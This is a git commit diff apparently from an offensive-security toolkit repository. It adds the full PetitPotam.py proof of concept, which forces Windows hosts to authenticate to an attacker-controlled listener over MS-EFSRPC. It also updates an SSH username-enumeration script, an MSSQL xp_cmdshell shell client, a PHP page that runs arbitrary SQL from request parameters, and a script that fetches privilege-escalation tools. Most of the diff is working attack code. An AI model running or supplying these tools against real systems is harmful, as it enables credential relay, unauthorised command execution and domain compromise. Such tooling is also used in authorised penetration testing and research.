update + fix

2023-10-24 23:45:09 +02:00 · 2023-10-24 23:45:09 +02:00 · afb27bd33d
commit afb27bd33d
parent 577fa39263
10 changed files with 691 additions and 219 deletions
--- a/PetitPotam.py
+++ b/PetitPotam.py
@ -0,0 +1,461 @@
+#!/usr/bin/env python
+# 
+# Author: GILLES Lionel aka topotam (@topotam77)
+# 
+# Greetz : grenadine(@Greynardine), skar(@__skar), didakt(@inf0sec1), plissken, pixis(@HackAndDo) my friends!
+# "Most of" the code stolen from dementor.py from @3xocyte ;)
+
+
+import sys
+import argparse
+
+from impacket import system_errors
+from impacket.dcerpc.v5 import transport
+from impacket.dcerpc.v5.ndr import NDRCALL, NDRSTRUCT
+from impacket.dcerpc.v5.dtypes import UUID, ULONG, WSTR, DWORD, NULL, BOOL, UCHAR, PCHAR, RPC_SID, LPWSTR
+from impacket.dcerpc.v5.rpcrt import DCERPCException, RPC_C_AUTHN_WINNT, RPC_C_AUTHN_LEVEL_PKT_PRIVACY
+from impacket.uuid import uuidtup_to_bin
+
+
+show_banner = '''
+                                                                                               
+              ___            _        _      _        ___            _                     
+             | _ \   ___    | |_     (_)    | |_     | _ \   ___    | |_    __ _    _ __   
+             |  _/  / -_)   |  _|    | |    |  _|    |  _/  / _ \   |  _|  / _` |  | '  \  
+            _|_|_   \___|   _\__|   _|_|_   _\__|   _|_|_   \___/   _\__|  \__,_|  |_|_|_| 
+          _| """ |_|"""""|_|"""""|_|"""""|_|"""""|_| """ |_|"""""|_|"""""|_|"""""|_|"""""| 
+          "`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 
+                                         
+              PoC to elicit machine account authentication via some MS-EFSRPC functions
+                                      by topotam (@topotam77)
+      
+                     Inspired by @tifkin_ & @elad_shamir previous work on MS-RPRN
+
+
+'''
+
+class DCERPCSessionError(DCERPCException):
+    def __init__(self, error_string=None, error_code=None, packet=None):
+        DCERPCException.__init__(self, error_string, error_code, packet)
+
+    def __str__( self ):
+        key = self.error_code
+        if key in system_errors.ERROR_MESSAGES:
+            error_msg_short = system_errors.ERROR_MESSAGES[key][0]
+            error_msg_verbose = system_errors.ERROR_MESSAGES[key][1]
+            return 'EFSR SessionError: code: 0x%x - %s - %s' % (self.error_code, error_msg_short, error_msg_verbose)
+        else:
+            return 'EFSR SessionError: unknown error code: 0x%x' % self.error_code
+
+
+################################################################################
+# STRUCTURES
+################################################################################
+class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
+    align = 1
+    structure = (
+        ('Data', '20s'),
+    )
+class EXIMPORT_CONTEXT_HANDLE(NDRSTRUCT):
+    align = 1
+    structure = (
+        ('Data', '20s'),
+    )
+class EFS_EXIM_PIPE(NDRSTRUCT):
+    align = 1
+    structure = (
+        ('Data', ':'),
+    )
+class EFS_HASH_BLOB(NDRSTRUCT):
+    
+    structure = (
+        ('Data', DWORD),
+        ('cbData', PCHAR),
+    )
+class EFS_RPC_BLOB(NDRSTRUCT):
+    
+    structure = (
+        ('Data', DWORD),
+        ('cbData', PCHAR),
+    )
+    
+class EFS_CERTIFICATE_BLOB(NDRSTRUCT):
+    structure = (
+        ('Type', DWORD),
+        ('Data', DWORD),
+        ('cbData', PCHAR),
+    )    
+class ENCRYPTION_CERTIFICATE_HASH(NDRSTRUCT):
+    structure = (
+        ('Lenght', DWORD),
+        ('SID', RPC_SID),
+        ('Hash', EFS_HASH_BLOB),
+        ('Display', LPWSTR),
+    )   
+class ENCRYPTION_CERTIFICATE(NDRSTRUCT):
+    structure = (
+        ('Lenght', DWORD),
+        ('SID', RPC_SID),
+        ('Hash', EFS_CERTIFICATE_BLOB),
+   
+    )   
+class ENCRYPTION_CERTIFICATE_HASH_LIST(NDRSTRUCT):
+    align = 1
+    structure = (
+        ('Cert', DWORD),
+        ('Users', ENCRYPTION_CERTIFICATE_HASH),
+    )
+class ENCRYPTED_FILE_METADATA_SIGNATURE(NDRSTRUCT):    
+    structure = (
+        ('Type', DWORD),
+        ('HASH', ENCRYPTION_CERTIFICATE_HASH_LIST),
+        ('Certif', ENCRYPTION_CERTIFICATE),
+        ('Blob', EFS_RPC_BLOB),
+    )   
+class EFS_RPC_BLOB(NDRSTRUCT):
+    structure = (
+        ('Data', DWORD),
+        ('cbData', PCHAR),
+    )
+class ENCRYPTION_CERTIFICATE_LIST(NDRSTRUCT):
+    align = 1
+    structure = (
+        ('Data', ':'),
+    )
+
+################################################################################
+# RPC CALLS
+################################################################################
+class EfsRpcOpenFileRaw(NDRCALL):
+    opnum = 0
+    structure = (
+        ('fileName', WSTR), 
+        ('Flag', ULONG),
+    )
+    
+class EfsRpcOpenFileRawResponse(NDRCALL):
+    structure = (
+        ('hContext', EXIMPORT_CONTEXT_HANDLE),
+        ('ErrorCode', ULONG),
+    )
+class EfsRpcEncryptFileSrv(NDRCALL):
+    opnum = 4
+    structure = (
+        ('FileName', WSTR),
+    )
+
+class EfsRpcEncryptFileSrvResponse(NDRCALL):
+    structure = (
+        ('ErrorCode', ULONG),
+    )
+class EfsRpcDecryptFileSrv(NDRCALL):
+    opnum = 5
+    structure = (
+        ('FileName', WSTR),
+        ('Flag', ULONG),
+    )
+
+class EfsRpcDecryptFileSrvResponse(NDRCALL):
+    structure = (
+        ('ErrorCode', ULONG),
+    )
+class EfsRpcQueryUsersOnFile(NDRCALL):
+    opnum = 6
+    structure = (
+        ('FileName', WSTR),
+        
+    )
+class EfsRpcQueryUsersOnFileResponse(NDRCALL):
+    structure = (
+        ('ErrorCode', ULONG),
+    )
+class EfsRpcQueryRecoveryAgents(NDRCALL):
+    opnum = 7
+    structure = (
+        ('FileName', WSTR),
+        
+    )
+class EfsRpcQueryRecoveryAgentsResponse(NDRCALL):
+    structure = (
+        ('ErrorCode', ULONG),
+    )
+class EfsRpcRemoveUsersFromFile(NDRCALL):
+    opnum = 8
+    structure = (
+        ('FileName', WSTR),
+        ('Users', ENCRYPTION_CERTIFICATE_HASH_LIST)
+        
+    )
+class EfsRpcRemoveUsersFromFileResponse(NDRCALL):
+    structure = (
+        ('ErrorCode', ULONG),
+    )
+class EfsRpcAddUsersToFile(NDRCALL):
+    opnum = 9
+    structure = (
+        ('FileName', WSTR),
+        ('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST)
+        
+    )
+class EfsRpcAddUsersToFileResponse(NDRCALL):
+    structure = (
+        ('ErrorCode', ULONG),
+    )    
+class EfsRpcFileKeyInfo(NDRCALL):
+    opnum = 12
+    structure = (
+        ('FileName', WSTR),
+        ('infoClass', DWORD),
+    )
+class EfsRpcFileKeyInfoResponse(NDRCALL):
+    structure = (
+        ('ErrorCode', ULONG),
+    )
+class EfsRpcDuplicateEncryptionInfoFile(NDRCALL):
+    opnum = 13
+    structure = (
+        ('SrcFileName', WSTR),
+        ('DestFileName', WSTR),
+        ('dwCreationDisposition', DWORD),
+        ('dwAttributes', DWORD),
+        ('RelativeSD', EFS_RPC_BLOB),
+        ('bInheritHandle', BOOL),
+    ) 
+    
+class EfsRpcDuplicateEncryptionInfoFileResponse(NDRCALL):
+    structure = (
+        ('ErrorCode', ULONG),
+    )
+class EfsRpcAddUsersToFileEx(NDRCALL):
+    opnum = 15
+    structure = (
+        ('dwFlags', DWORD),
+        ('Reserved', EFS_RPC_BLOB),
+        ('FileName', WSTR),
+        ('dwAttributes', DWORD),
+        ('EncryptionCertificates', ENCRYPTION_CERTIFICATE_LIST),
+    ) 
+    
+class EfsRpcAddUsersToFileExResponse(NDRCALL):
+    structure = (
+        ('ErrorCode', ULONG),
+    )
+class EfsRpcFileKeyInfoEx(NDRCALL):
+    opnum = 16
+    structure = (
+        ('dwFileKeyInfoFlags', DWORD),
+        ('Reserved', EFS_RPC_BLOB),
+        ('FileName', WSTR),
+        ('InfoClass', DWORD),
+    )
+class EfsRpcFileKeyInfoExResponse(NDRCALL):
+    structure = (
+        ('ErrorCode', ULONG),
+    )
+class EfsRpcGetEncryptedFileMetadata(NDRCALL):
+    opnum = 18
+    structure = (
+        ('FileName', WSTR),
+    )
+class EfsRpcGetEncryptedFileMetadataResponse(NDRCALL):
+    structure = (
+        ('ErrorCode', ULONG),
+    )   
+class EfsRpcSetEncryptedFileMetadata(NDRCALL):
+    opnum = 19
+    structure = (
+        ('FileName', WSTR),
+        ('OldEfsStreamBlob', EFS_RPC_BLOB),
+        ('NewEfsStreamBlob', EFS_RPC_BLOB),
+        ('NewEfsSignature', ENCRYPTED_FILE_METADATA_SIGNATURE),
+    )
+class EfsRpcSetEncryptedFileMetadataResponse(NDRCALL):
+    structure = (
+        ('ErrorCode', ULONG),
+    )
+class EfsRpcEncryptFileExSrv(NDRCALL):
+    opnum = 21
+    structure = (
+        ('FileName', WSTR),
+        ('ProtectorDescriptor', WSTR),
+        ('Flags', ULONG),
+    )
+class EfsRpcEncryptFileExSrvResponse(NDRCALL):
+    structure = (
+        ('ErrorCode', ULONG),
+    )
+#class EfsRpcQueryProtectors(NDRCALL):
+#    opnum = 21
+#    structure = (
+#        ('FileName', WSTR),
+#        ('ppProtectorList', PENCRYPTION_PROTECTOR_LIST),
+#    )
+#class EfsRpcQueryProtectorsResponse(NDRCALL):
+#    structure = (
+#        ('ErrorCode', ULONG),
+#    )
+
+################################################################################
+# OPNUMs and their corresponding structures
+################################################################################
+OPNUMS = {
+    0   : (EfsRpcOpenFileRaw, EfsRpcOpenFileRawResponse),
+    4   : (EfsRpcEncryptFileSrv, EfsRpcEncryptFileSrvResponse),
+    5   : (EfsRpcDecryptFileSrv, EfsRpcDecryptFileSrvResponse),
+    6   : (EfsRpcQueryUsersOnFile, EfsRpcQueryUsersOnFileResponse),
+    7   : (EfsRpcQueryRecoveryAgents, EfsRpcQueryRecoveryAgentsResponse),
+    8   : (EfsRpcRemoveUsersFromFile, EfsRpcRemoveUsersFromFileResponse),
+    9   : (EfsRpcAddUsersToFile, EfsRpcAddUsersToFileResponse),
+    12   : (EfsRpcFileKeyInfo, EfsRpcFileKeyInfoResponse),
+    13   : (EfsRpcDuplicateEncryptionInfoFile, EfsRpcDuplicateEncryptionInfoFileResponse),
+    15   : (EfsRpcAddUsersToFileEx, EfsRpcAddUsersToFileExResponse),
+    16   : (EfsRpcFileKeyInfoEx, EfsRpcFileKeyInfoExResponse),
+    18   : (EfsRpcGetEncryptedFileMetadata, EfsRpcGetEncryptedFileMetadataResponse),
+    19   : (EfsRpcSetEncryptedFileMetadata, EfsRpcSetEncryptedFileMetadataResponse),
+    21   : (EfsRpcEncryptFileExSrv, EfsRpcEncryptFileExSrvResponse),
+#    22   : (EfsRpcQueryProtectors, EfsRpcQueryProtectorsResponse),
+}
+ 
+class CoerceAuth():
+    def connect(self, username, password, domain, lmhash, nthash, target, pipe, doKerberos, dcHost, targetIp):
+        binding_params = {
+            'lsarpc': {
+                'stringBinding': r'ncacn_np:%s[\PIPE\lsarpc]' % target,
+                'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
+            },
+            'efsr': {
+                'stringBinding': r'ncacn_np:%s[\PIPE\efsrpc]' % target,
+                'MSRPC_UUID_EFSR': ('df1941c5-fe89-4e79-bf10-463657acf44d', '1.0')
+            },
+            'samr': {
+                'stringBinding': r'ncacn_np:%s[\PIPE\samr]' % target,
+                'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
+            },
+            'lsass': {
+                'stringBinding': r'ncacn_np:%s[\PIPE\lsass]' % target,
+                'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
+            },
+            'netlogon': {
+                'stringBinding': r'ncacn_np:%s[\PIPE\netlogon]' % target,
+                'MSRPC_UUID_EFSR': ('c681d488-d850-11d0-8c52-00c04fd90f7e', '1.0')
+            },
+        }
+        rpctransport = transport.DCERPCTransportFactory(binding_params[pipe]['stringBinding'])
+        if hasattr(rpctransport, 'set_credentials'):
+            rpctransport.set_credentials(username=username, password=password, domain=domain, lmhash=lmhash, nthash=nthash)
+
+        if doKerberos:
+            rpctransport.set_kerberos(doKerberos, kdcHost=dcHost)
+        if targetIp:
+            rpctransport.setRemoteHost(targetIp)
+
+        dce = rpctransport.get_dce_rpc()
+        dce.set_auth_type(RPC_C_AUTHN_WINNT)
+        dce.set_auth_level(RPC_C_AUTHN_LEVEL_PKT_PRIVACY)
+        print("[-] Connecting to %s" % binding_params[pipe]['stringBinding'])
+        try:
+            dce.connect()
+        except Exception as e:
+            print("Something went wrong, check error status => %s" % str(e))  
+            #sys.exit()
+            return
+        print("[+] Connected!")
+        print("[+] Binding to %s" % binding_params[pipe]['MSRPC_UUID_EFSR'][0])
+        try:
+            dce.bind(uuidtup_to_bin(binding_params[pipe]['MSRPC_UUID_EFSR']))
+        except Exception as e:
+            print("Something went wrong, check error status => %s" % str(e)) 
+            #sys.exit()
+            return
+        print("[+] Successfully bound!")
+        return dce
+        
+    def EfsRpcOpenFileRaw(self, dce, listener):
+        print("[-] Sending EfsRpcOpenFileRaw!")
+        try:
+            request = EfsRpcOpenFileRaw()
+            request['fileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
+            request['Flag'] = 0
+            #request.dump()
+            resp = dce.request(request)
+            
+        except Exception as e:
+            if str(e).find('ERROR_BAD_NETPATH') >= 0:
+                print('[+] Got expected ERROR_BAD_NETPATH exception!!')
+                print('[+] Attack worked!')
+                #sys.exit()
+                return None
+            if str(e).find('rpc_s_access_denied') >= 0:
+                print('[-] Got RPC_ACCESS_DENIED!! EfsRpcOpenFileRaw is probably PATCHED!')
+                print('[+] OK! Using unpatched function!')
+                print("[-] Sending EfsRpcEncryptFileSrv!")
+                try:
+                    request = EfsRpcEncryptFileSrv()
+                    request['FileName'] = '\\\\%s\\test\\Settings.ini\x00' % listener
+                    resp = dce.request(request)
+                except Exception as e:
+                    if str(e).find('ERROR_BAD_NETPATH') >= 0:
+                        print('[+] Got expected ERROR_BAD_NETPATH exception!!')
+                        print('[+] Attack worked!')
+                        pass
+                    else:
+                        print("Something went wrong, check error status => %s" % str(e)) 
+                        return None
+                        #sys.exit()
+                
+            else:
+                print("Something went wrong, check error status => %s" % str(e)) 
+                return None
+                #sys.exit()
+
+def main():
+    parser = argparse.ArgumentParser(add_help = True, description = "PetitPotam - rough PoC to connect to lsarpc and elicit machine account authentication via MS-EFSRPC EfsRpcOpenFileRaw()")
+    parser.add_argument('-u', '--username', action="store", default='', help='valid username')
+    parser.add_argument('-p', '--password', action="store", default='', help='valid password (if omitted, it will be asked unless -no-pass)')
+    parser.add_argument('-d', '--domain', action="store", default='', help='valid domain name')
+    parser.add_argument('-hashes', action="store", metavar="[LMHASH]:NTHASH", help='NT/LM hashes (LM hash can be empty)')
+
+    parser.add_argument('-no-pass', action="store_true", help='don\'t ask for password (useful for -k)')
+    parser.add_argument('-k', action="store_true", help='Use Kerberos authentication. Grabs credentials from ccache file '
+                        '(KRB5CCNAME) based on target parameters. If valid credentials '
+                        'cannot be found, it will use the ones specified in the command '
+                        'line')
+    parser.add_argument('-dc-ip', action="store", metavar="ip address", help='IP Address of the domain controller. If omitted it will use the domain part (FQDN) specified in the target parameter')
+    parser.add_argument('-target-ip', action='store', metavar="ip address",
+                        help='IP Address of the target machine. If omitted it will use whatever was specified as target. '
+                        'This is useful when target is the NetBIOS name or Kerberos name and you cannot resolve it')
+
+    parser.add_argument('-pipe', action="store", choices=['efsr', 'lsarpc', 'samr', 'netlogon', 'lsass', 'all'], default='lsarpc', help='Named pipe to use (default: lsarpc) or all')
+    parser.add_argument('listener', help='ip address or hostname of listener')
+    parser.add_argument('target', help='ip address or hostname of target')
+    options = parser.parse_args()
+
+    if options.hashes is not None:
+        lmhash, nthash = options.hashes.split(':')
+    else:
+        lmhash = ''
+        nthash = ''
+
+    print(show_banner)
+
+    if options.password == '' and options.username != '' and options.hashes is None and options.no_pass is not True:
+        from getpass import getpass
+        options.password = getpass("Password:")
+    
+    plop = CoerceAuth()
+    
+    if options.pipe == "all":
+        all_pipes = ['efsr', 'lsarpc', 'samr', 'netlogon', 'lsass']
+    else:
+        all_pipes = [options.pipe]
+    
+    for all_pipe in all_pipes:
+        print("Trying pipe", all_pipe)
+        dce = plop.connect(username=options.username, password=options.password, domain=options.domain, lmhash=lmhash, nthash=nthash, target=options.target, pipe=all_pipe, doKerberos=options.k, dcHost=options.dc_ip, targetIp=options.target_ip)
+        if dce is not None:
+            plop.EfsRpcOpenFileRaw(dce, options.listener)
+            dce.disconnect()
+    sys.exit()   
+             
+if __name__ == '__main__':
+    main()
--- a/BIN
+++ b/BIN
--- a/fileserver.py
+++ b/fileserver.py
@ -247,11 +247,14 @@ class HttpFileServer(HTTPServer):

    def get_base_url(self, ip_addr=None):
        addr, port = self.server_address
-        if port != 80:
-            port = f":{port}"
+    
        if ip_addr is not None:
            addr = ip_addr
+
        protocol = "https" if type(self.socket) == ssl.SSLSocket else "http"
+        if (int(port) == 80 and protocol == "http") or (int(port) == 443 and protocol == "https"):
+            port = ""
+    
        return f"{protocol}://{addr}{port}"

    def get_full_url(self, uri, ip_addr=None):
--- a/linpeas.sh
+++ b/linpeas.sh
--- a/sql.php
+++ b/sql.php
@ -1,10 +1,20 @@
 <?php
+
 error_reporting(E_ALL);
-$username = $_REQUEST["username"]; 
-$password = $_REQUEST["password"];
-$database = (isset($_REQUEST["database"]) ? $_REQUEST["database"] : null);
-$host     = (isset($_REQUEST["host"]) ? $_REQUEST["host"] : "localhost");
-$query    = (isset($_REQUEST["query"]) ? $_REQUEST["query"] : "SELECT @@version");
+
+if (php_sapi_name() === "cli") {
+  $username = $argv[1];
+  $password = $argv[2];
+  $database = $argv[3] ?? null;
+  $host = $argv[4] ?? "localhost";
+  $query = $argv[5] ?? "SELECT @@version";
+} else {
+  $username = $_REQUEST["username"]; 
+  $password = $_REQUEST["password"];
+  $database = (isset($_REQUEST["database"]) ? $_REQUEST["database"] : null);
+  $host     = (isset($_REQUEST["host"]) ? $_REQUEST["host"] : "localhost");
+  $query    = (isset($_REQUEST["query"]) ? $_REQUEST["query"] : "SELECT @@version");  
+}

 $link = mysqli_connect($host, $username, $password, $database);
 if (!$link) {
--- a/ssh-check-username.py
+++ b/ssh-check-username.py
@ -10,15 +10,6 @@ import socket
 import sys
 import pdb

-arg_parser = argparse.ArgumentParser()
-arg_parser.add_argument('-t',dest='hostname', type=str, help='Single target')
-arg_parser.add_argument('-p',dest='port', type=int, default=22, help='port to connect on: Default port is 22')
-arg_parser.add_argument('-u',dest='username', type=str, help='username you want to enumerate')
-arg_parser.add_argument('-w',dest='wordlist', help='enumerate multiple users')
-args = arg_parser.parse_args()
-port = args.port
-target = args.hostname
-
 class InvalidUsername(Exception):
    pass

@ -59,22 +50,33 @@ def _paramiko_tunnel(username, *args, **kwargs):
        print ('[+] {} - Valid username'.format(us))
        return

+if __name__ == "__main__":

-paramiko.auth_handler.AuthHandler._client_handler_table.update({
+    arg_parser = argparse.ArgumentParser()
+    arg_parser.add_argument('-H',dest='hostname', type=str, help='Single target')
+    arg_parser.add_argument('-t',dest='threads', type=int, help='Number of threads', default=10)
+    arg_parser.add_argument('-p',dest='port', type=int, default=22, help='port to connect on: Default port is 22')
+    arg_parser.add_argument('-u',dest='username', type=str, help='username you want to enumerate')
+    arg_parser.add_argument('-w',dest='wordlist', help='enumerate multiple users')
+    args = arg_parser.parse_args()
+    port = args.port
+    target = args.hostname
+
+    paramiko.auth_handler.AuthHandler._client_handler_table.update({
        paramiko.common.MSG_SERVICE_ACCEPT: service_accept,
        paramiko.common.MSG_USERAUTH_FAILURE: userauth_failure
-})
+    })

-logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())
+    logging.getLogger('paramiko.transport').addHandler(logging.NullHandler())

-if args.username is not None:
+    if args.username is not None:
        username = args.username
        _paramiko_tunnel(target, port, username)

-if args.wordlist is not None:
+    if args.wordlist is not None:
        usernames = []
        mp = []
-    pool = multiprocessing.Pool(5)
+        pool = multiprocessing.Pool(args.threads)
        with open(args.wordlist) as f:
            for u in f:
                usernames.append(u)
--- a/update.sh
+++ b/update.sh
@ -1,6 +1,6 @@
 #!/bin/bash

-# Usage: download_zip <url> <destination file>
+# Usage: download <url> <destination file>
 download () {
  tmpfile=$(mktemp /tmp/wget.XXXXXX)
  wget --no-verbose "$1" -O "$tmpfile"
@ -48,6 +48,7 @@ download https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration
 download https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh linux-exploit-suggester.sh
 download https://github.com/rebootuser/LinEnum/raw/master/LinEnum.sh LinEnum.sh
 download https://github.com/stealthcopter/deepce/raw/main/deepce.sh deepce.sh
+download https://raw.githubusercontent.com/topotam/PetitPotam/main/PetitPotam.py PetitPotam.py

 echo "Updating LinPEAS + WinPEAS…"
 peas_version=$(get_latest_version carlospolop/PEASS-ng)
--- a/win/winPEAS.exe
+++ b/win/winPEAS.exe
--- a/win/winPEASx64.exe
+++ b/win/winPEASx64.exe
--- a/xp_cmdshell.py
+++ b/xp_cmdshell.py
@ -44,7 +44,6 @@ class XpShell(cmd.Cmd):
            print('Exception: ')
            print(str(e))
            raise e
-            pass

    # i wont say what it does
    def do_exit(self, arg):
@ -151,8 +150,9 @@ def connect_mssql(ip, port=1433, username="sa", password="", domain=""):
    # do database connection (simple for now)
    ms_sql = tds.MSSQL(ip, port)
    ms_sql.connect()
-    res = ms_sql.login(database = None, username=username, password=password, domain=domain)
+    res = ms_sql.login(database=None, username=username, password=password, domain=domain)
    ms_sql.printReplies()
+    print(res)
    if res:
        return XpShell(ms_sql)
    else:
@ -167,12 +167,13 @@ if __name__ == '__main__':

    parser = argparse.ArgumentParser(description="Connect to mssql server using username, password, and hostname.")
    parser.add_argument('-u', '--username', required=True, help="Username for the server")
-    parser.add_argument('-p', '--password', required=True, help="Password for the server")
+    parser.add_argument('-p', '--password', required=False, default="", help="Password for the server")
    parser.add_argument('-H', '--hostname', required=True, help="Hostname or IP address of the server")
+    parser.add_argument('-d', '--domain', required=False, default=None, help="Domain the user belongs to")
    args = parser.parse_args()

    # if connection successful
-    xp_shell = connect_mssql(args.hostname, username=args.username, password=args.password)
+    xp_shell = connect_mssql(args.hostname, username=args.username, password=args.password, domain=args.domain)
    if isinstance(xp_shell, XpShell):
        xp_shell.do_enable_xp_cmdshell()
        xp_shell.pwsh = True